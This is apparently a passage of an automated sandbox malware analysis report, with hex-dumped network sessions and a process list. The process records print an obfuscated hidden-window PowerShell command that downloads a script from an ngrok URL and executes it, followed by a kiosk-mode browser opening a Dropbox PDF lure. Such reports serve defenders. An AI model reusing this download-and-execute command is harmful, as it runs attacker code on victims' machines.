                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:48 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:48 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 70 50 43 69 75 2f 71 58 38 55 4f 68 65 39 77 75 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 66 30 63 66 32 64 32 35 66 30 32 62 35 62 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 75 34 2b 72 62 65 4f 36 32 67 56 41 64 43 47 6d 4a 57 6e 32 69 55 56 77 74 78 48 46 79 55 54 6b 58 59 76 67 47 4c 2f 66 68 44 4b 69 76 79 64 54 36 50 31 57 6b 73 33 64 53 47 69 69 66 46 63 2b 6e 7a 67 65 4a 64 36 7a 43 6d 2f 53 30 69 73 51 65 52 2b 6e 5a 36 70 55 75 76 2b 4e 61 37 78 63 38 6f 41 54 6d 31 39 70 61 50 6f 34
                                                                                                                                                                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: pPCiu/qX8UOhe9wu.2Context: 4f0cf2d25f02b5b4<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWu4+rbeO62gVAdCGmJWn2iUVwtxHFyUTkXYvgGL/fhDKivydT6P1Wks3dSGiifFc+nzgeJd6zCm/S0isQeR+nZ6pUuv+Na7xc8oATm19paPo4
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:48 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 70 50 43 69 75 2f 71 58 38 55 4f 68 65 39 77 75 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 66 30 63 66 32 64 32 35 66 30 32 62 35 62 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: pPCiu/qX8UOhe9wu.3Context: 4f0cf2d25f02b5b4<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:48 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:48 UTC58INData Raw: 4d 53 2d 43 56 3a 20 37 5a 32 56 4d 78 6c 77 37 30 69 47 71 5a 74 38 63 73 55 2f 57 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                        Data Ascii: MS-CV: 7Z2VMxlw70iGqZt8csU/WA.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                        21192.168.2.64989920.198.118.190443
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:41:08 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 41 31 54 63 6a 44 74 53 7a 6b 69 31 6e 7a 30 55 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 65 65 33 36 37 37 34 32 62 30 39 62 34 62 32 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: A1TcjDtSzki1nz0U.1Context: 5ee367742b09b4b2
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:41:08 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:41:08 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 41 31 54 63 6a 44 74 53 7a 6b 69 31 6e 7a 30 55 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 65 65 33 36 37 37 34 32 62 30 39 62 34 62 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 75 34 2b 72 62 65 4f 36 32 67 56 41 64 43 47 6d 4a 57 6e 32 69 55 56 77 74 78 48 46 79 55 54 6b 58 59 76 67 47 4c 2f 66 68 44 4b 69 76 79 64 54 36 50 31 57 6b 73 33 64 53 47 69 69 66 46 63 2b 6e 7a 67 65 4a 64 36 7a 43 6d 2f 53 30 69 73 51 65 52 2b 6e 5a 36 70 55 75 76 2b 4e 61 37 78 63 38 6f 41 54 6d 31 39 70 61 50 6f 34
                                                                                                                                                                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: A1TcjDtSzki1nz0U.2Context: 5ee367742b09b4b2<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWu4+rbeO62gVAdCGmJWn2iUVwtxHFyUTkXYvgGL/fhDKivydT6P1Wks3dSGiifFc+nzgeJd6zCm/S0isQeR+nZ6pUuv+Na7xc8oATm19paPo4
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:41:08 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 41 31 54 63 6a 44 74 53 7a 6b 69 31 6e 7a 30 55 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 65 65 33 36 37 37 34 32 62 30 39 62 34 62 32 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: A1TcjDtSzki1nz0U.3Context: 5ee367742b09b4b2<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:41:08 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:41:08 UTC58INData Raw: 4d 53 2d 43 56 3a 20 5a 67 79 36 63 42 6c 55 64 6b 6d 72 4c 43 64 74 58 54 62 72 79 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                        Data Ascii: MS-CV: Zgy6cBlUdkmrLCdtXTbryA.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                        22192.168.2.64996220.198.118.190443
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:41:34 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 59 39 2b 75 33 62 66 30 4c 30 69 56 50 39 78 32 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 36 64 30 66 65 61 36 35 37 62 62 31 34 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                        Data Ascii: CNT 1 CON 304MS-CV: Y9+u3bf0L0iVP9x2.1Context: 46d0fea657bb141
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:41:34 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:41:34 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 59 39 2b 75 33 62 66 30 4c 30 69 56 50 39 78 32 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 36 64 30 66 65 61 36 35 37 62 62 31 34 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 75 34 2b 72 62 65 4f 36 32 67 56 41 64 43 47 6d 4a 57 6e 32 69 55 56 77 74 78 48 46 79 55 54 6b 58 59 76 67 47 4c 2f 66 68 44 4b 69 76 79 64 54 36 50 31 57 6b 73 33 64 53 47 69 69 66 46 63 2b 6e 7a 67 65 4a 64 36 7a 43 6d 2f 53 30 69 73 51 65 52 2b 6e 5a 36 70 55 75 76 2b 4e 61 37 78 63 38 6f 41 54 6d 31 39 70 61 50 6f 34 6b
                                                                                                                                                                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: Y9+u3bf0L0iVP9x2.2Context: 46d0fea657bb141<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWu4+rbeO62gVAdCGmJWn2iUVwtxHFyUTkXYvgGL/fhDKivydT6P1Wks3dSGiifFc+nzgeJd6zCm/S0isQeR+nZ6pUuv+Na7xc8oATm19paPo4k
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:41:34 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 59 39 2b 75 33 62 66 30 4c 30 69 56 50 39 78 32 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 36 64 30 66 65 61 36 35 37 62 62 31 34 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 196MS-CV: Y9+u3bf0L0iVP9x2.3Context: 46d0fea657bb141<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:41:34 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:41:34 UTC58INData Raw: 4d 53 2d 43 56 3a 20 2b 4a 32 4d 56 37 5a 6a 4a 55 43 59 54 63 37 4b 64 71 30 75 51 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                        Data Ascii: MS-CV: +J2MV7ZjJUCYTc7Kdq0uQA.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                        23192.168.2.65002720.198.118.190443
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:42:02 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6c 6b 36 34 49 47 7a 4f 53 45 69 78 79 4d 4b 75 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 61 65 64 61 31 61 34 36 62 39 37 64 31 66 66 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: lk64IGzOSEixyMKu.1Context: 3aeda1a46b97d1ff
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:42:02 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:42:02 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6c 6b 36 34 49 47 7a 4f 53 45 69 78 79 4d 4b 75 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 61 65 64 61 31 61 34 36 62 39 37 64 31 66 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 75 34 2b 72 62 65 4f 36 32 67 56 41 64 43 47 6d 4a 57 6e 32 69 55 56 77 74 78 48 46 79 55 54 6b 58 59 76 67 47 4c 2f 66 68 44 4b 69 76 79 64 54 36 50 31 57 6b 73 33 64 53 47 69 69 66 46 63 2b 6e 7a 67 65 4a 64 36 7a 43 6d 2f 53 30 69 73 51 65 52 2b 6e 5a 36 70 55 75 76 2b 4e 61 37 78 63 38 6f 41 54 6d 31 39 70 61 50 6f 34
                                                                                                                                                                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: lk64IGzOSEixyMKu.2Context: 3aeda1a46b97d1ff<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWu4+rbeO62gVAdCGmJWn2iUVwtxHFyUTkXYvgGL/fhDKivydT6P1Wks3dSGiifFc+nzgeJd6zCm/S0isQeR+nZ6pUuv+Na7xc8oATm19paPo4
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:42:02 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6c 6b 36 34 49 47 7a 4f 53 45 69 78 79 4d 4b 75 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 61 65 64 61 31 61 34 36 62 39 37 64 31 66 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: lk64IGzOSEixyMKu.3Context: 3aeda1a46b97d1ff<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:42:03 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:42:03 UTC58INData Raw: 4d 53 2d 43 56 3a 20 2b 6f 33 44 76 4f 5a 75 73 55 32 4d 58 6f 6f 59 47 31 46 45 44 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                        Data Ascii: MS-CV: +o3DvOZusU2MXooYG1FEDQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                                                                        Start time:12:40:02
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing)
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7000d0000
                                                                                                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                                                                                                        Start time:12:40:02
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                                                                        Start time:12:40:02
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing)
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                                                                        Start time:12:40:21
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                                                                        Start time:12:40:22
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
